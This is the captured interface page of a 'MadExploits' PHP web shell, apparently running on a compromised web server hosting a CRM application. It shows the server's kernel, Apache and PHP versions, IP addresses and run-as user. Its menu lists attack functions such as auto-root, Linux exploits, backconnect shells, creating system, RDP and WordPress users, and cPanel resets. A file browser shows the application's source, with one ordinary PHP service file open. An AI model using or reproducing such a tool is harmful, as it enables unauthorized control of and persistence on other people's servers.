Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.100
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
app /
Services /
Front /
[ HOME SHELL ]
Name
Size
Permission
Action
ActivityService.php
1.21
KB
-rw-r--r--
ClientService.php
2.64
KB
-rw-r--r--
CourierService.php
5.78
KB
-rw-r--r--
DealProductService.php
940
B
-rw-r--r--
DealService.php
348.36
KB
-rw-r--r--
EmailPhoneDetailService.php
1.28
KB
-rw-r--r--
FileService.php
1.17
KB
-rw-r--r--
NoteService.php
1.17
KB
-rw-r--r--
PipelineService.php
88.35
KB
-rw-r--r--
PipelineStageService.php
1.59
KB
-rw-r--r--
ProductService.php
1.31
KB
-rw-r--r--
UserService.php
1.32
KB
-rw-r--r--
VendorService.php
3.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DealProductService.php
<?php /** * Created by crm_entity command. * @author : Muhammad Saeed * @todo : Service todo * @since : $2021Aug31 * @description : Service description */ namespace App\Services\Front; use App\Models\DealProduct; use App\Services\DealProductService as ParentService; use App\Repositories\DealProductRepository; use http\Exception; class DealProductService extends ParentService { /** * @var DealRepository */ protected $repository; /** * @var NoteRepository */ public function __construct(DealProductRepository $repository ) { parent::__construct($repository, 'Front'); } public function getDealProducts($id){ $deal_products= new DealProduct(); return $deal_products->getDealProducts( $id); } public function getProductPrinting(){ $deal_products= new DealProduct(); return $deal_products->getProductPrinting(); } }
Close